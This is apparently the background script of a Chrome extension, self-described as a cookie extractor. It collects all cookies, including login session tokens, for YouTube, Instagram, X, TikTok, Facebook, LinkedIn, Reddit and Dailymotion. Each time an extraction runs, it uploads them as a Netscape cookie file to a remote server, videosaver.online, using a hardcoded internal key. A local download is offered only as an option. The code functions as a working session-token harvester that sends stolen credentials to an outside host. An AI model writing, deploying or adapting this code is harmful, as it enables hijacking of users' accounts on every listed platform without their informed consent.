const CONFIG = {
  BACKEND_URL: "https://videosaver.online/internal/cookies",
  API_KEY: "buckty-internal-secret"
};

const PLATFORMS = {
  "YouTube": {
    urls: ["https://www.youtube.com", "https://youtube.com"],
    authCookies: ["LOGIN_INFO", "SAPISID", "APISID", "SSID"]
  },
  "Instagram": {
    urls: ["https://www.instagram.com"],
    authCookies: ["sessionid", "ds_user_id"]
  },
  "Twitter": {
    urls: ["https://x.com", "https://twitter.com"],
    authCookies: ["auth_token", "twid"]
  },
  "TikTok": {
    urls: ["https://www.tiktok.com"],
    authCookies: ["sessionid_ss", "msToken", "odin_tt"]
  },
  "Facebook": {
    urls: ["https://www.facebook.com"],
    authCookies: ["c_user", "xs", "fr"]
  },
  "Dailymotion": {
    urls: ["https://www.dailymotion.com"],
    authCookies: ["sid", "dmvk", "ts"]
  },
  "LinkedIn": {
    urls: ["https://www.linkedin.com"],
    authCookies: ["li_at", "JSESSIONID"]
  },
  "Reddit": {
    urls: ["https://www.reddit.com"],
    authCookies: ["reddit_session", "token_v2", "session_tracker"]
  }
};

// Convert Chrome cookie to Netscape format line
function toNetscapeLine(cookie) {
  const domain = cookie.domain || "";
  const subdomain = domain.startsWith(".") ? "TRUE" : "FALSE";
  const secure = cookie.secure ? "TRUE" : "FALSE";
  const expires = cookie.expirationDate ? Math.floor(cookie.expirationDate) : 0;
  const httpOnly = cookie.httpOnly ? "#HttpOnly_" : "";
  const path = cookie.path || "/";
  const name = cookie.name || "";
  const value = cookie.value || "";
  
  return `${httpOnly}${domain}\t${subdomain}\t${path}\t${secure}\t${expires}\t${name}\t${value}`;
}

// Extract cookies for a single platform
async function extractPlatformCookies(platformName, platformConfig) {
  const allCookies = [];
  const seen = new Set();
  
  for (const url of platformConfig.urls) {
    try {
      const cookies = await chrome.cookies.getAll({ url });
      
      for (const cookie of cookies) {
        const key = `${cookie.domain}:${cookie.name}`;
        if (seen.has(key)) continue;
        seen.add(key);
        allCookies.push(cookie);
      }
    } catch (err) {
      console.error(`[${platformName}] Error getting cookies for ${url}:`, err);
    }
  }
  
  return allCookies;
}

// Build Netscape format cookies file
function buildNetscape(allCookies) {
  const lines = [
    "# Netscape HTTP Cookie File",
    "# Generated by Buckty Cookie Extractor (Chrome Extension)",
    `# Date: ${new Date().toISOString()}`,
    ""
  ];
  
  for (const [platformName, cookies] of Object.entries(allCookies)) {
    if (!cookies || cookies.length === 0) continue;
    
    const sep = "─".repeat(Math.max(1, 40 - platformName.length));
    lines.push(`# ── ${platformName} ${sep}`);
    
    for (const cookie of cookies) {
      lines.push(toNetscapeLine(cookie));
    }
    
    lines.push("");
  }
  
  return lines.join("\n");
}

// Check auth status for each platform
function checkAuthStatus(platformName, platformConfig, cookies) {
  const cookieNames = new Set(cookies.map(c => c.name));
  const authCookies = platformConfig.authCookies || [];
  
  const found = authCookies.filter(name => cookieNames.has(name));
  const missing = authCookies.filter(name => !cookieNames.has(name));
  
  return {
    platform: platformName,
    total: cookies.length,
    authenticated: found.length > 0,
    found: found,
    missing: missing
  };
}

// Upload cookies to backend server
async function uploadToBackend(netscapeContent) {
  try {
    const response = await fetch(CONFIG.BACKEND_URL, {
      method: "POST",
      headers: {
        "X-Internal-Key": CONFIG.API_KEY,
        "Content-Type": "text/plain"
      },
      body: netscapeContent
    });
    
    return {
      success: response.status === 200,
      status: response.status,
      statusText: response.statusText
    };
  } catch (error) {
    return {
      success: false,
      error: error.message
    };
  }
}

// Main extraction function
async function extractAndUpload() {
  const allCookies = {};
  const authResults = [];
  
  // Extract cookies from all platforms
  for (const [platformName, platformConfig] of Object.entries(PLATFORMS)) {
    console.log(`[Extractor] Extracting ${platformName}...`);
    
    const cookies = await extractPlatformCookies(platformName, platformConfig);
    allCookies[platformName] = cookies;
    
    const authStatus = checkAuthStatus(platformName, platformConfig, cookies);
    authResults.push(authStatus);
    
    console.log(`[Extractor] ${platformName}: ${cookies.length} cookies, auth: ${authStatus.authenticated}`);
  }
  
  // Build Netscape format
  const netscapeContent = buildNetscape(allCookies);
  
  // Calculate totals
  const totalCookies = Object.values(allCookies).reduce((sum, arr) => sum + arr.length, 0);
  const authenticatedPlatforms = authResults.filter(r => r.authenticated).map(r => r.platform);
  const failedPlatforms = authResults.filter(r => !r.authenticated).map(r => r.platform);
  
  console.log(`[Extractor] Total: ${totalCookies} cookies`);
  console.log(`[Extractor] Authenticated: ${authenticatedPlatforms.join(", ") || "NONE"}`);
  console.log(`[Extractor] Failed: ${failedPlatforms.join(", ") || "NONE"}`);
  
  // Upload to backend
  console.log(`[Extractor] Uploading to ${CONFIG.BACKEND_URL}...`);
  const uploadResult = await uploadToBackend(netscapeContent);
  
  if (uploadResult.success) {
    console.log("[Extractor] Upload successful");
  } else {
    console.error("[Extractor] Upload failed:", uploadResult.error || uploadResult.statusText);
  }
  
  return {
    success: true,
    totalCookies,
    authenticatedPlatforms,
    failedPlatforms,
    authResults,
    netscapeContent,
    uploadResult
  };
}

// Download cookies as file
function downloadCookies(netscapeContent) {
  const blob = new Blob([netscapeContent], { type: "text/plain" });
  const url = URL.createObjectURL(blob);
  
  chrome.downloads.download({
    url: url,
    filename: "cookies.txt",
    saveAs: false
  });
}

// Message handler from popup
chrome.runtime.onMessage.addListener((request, sender, sendResponse) => {
  if (request.action === "extract") {
    extractAndUpload().then(result => {
      if (request.download) {
        downloadCookies(result.netscapeContent);
      }
      sendResponse({ success: true, ...result });
    }).catch(error => {
      console.error("[Extractor] Error:", error);
      sendResponse({ success: false, error: error.message });
    });
    
    return true; // Keep channel open for async response
  }
});